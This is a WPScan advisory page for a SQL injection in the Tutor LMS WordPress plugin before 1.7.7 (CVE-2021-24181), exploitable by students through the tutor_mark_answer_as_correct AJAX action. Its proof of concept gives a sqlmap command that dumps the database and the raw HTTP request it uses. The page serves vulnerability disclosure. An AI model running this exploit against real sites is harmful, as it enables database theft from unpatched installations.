WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Tutor LMS < 1.7.7 - SQL Injection via tutor_mark_answer_as_correct

Description

The tutor_mark_answer_as_correct AJAX action from the plugin was vulnerable to blind and time based SQL injections that could be exploited by students.

Proof of Concept

python3 sqlmap.py -r ~/tutortime.txt --dbms=mysql --technique=T -p answer_id --dump
Where tutortime.txt is

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [URL]
Content-Length: 74
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: [URL]
Referer: [URL]
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [COOKIES]
Connection: close

action=tutor_mark_answer_as_correct&answer_id=1&inputValue=1

Affects Plugins

tutor
Fixed in version 1.7.7

References

CVE
CVE-2021-24181
URL
https://www.wordfence.com/blog/2021/03/several-vulnerabilities-patched-in-tutor-lms-plugin/

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified

Yes

WPVDB ID
d5a00322-7098-4f8d-8e5e-157b63449c17

Timeline

Publicly Published

2021-03-15 (about 2 years ago)

Added

2021-03-15 (about 2 years ago)

Last Updated

2021-03-20 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin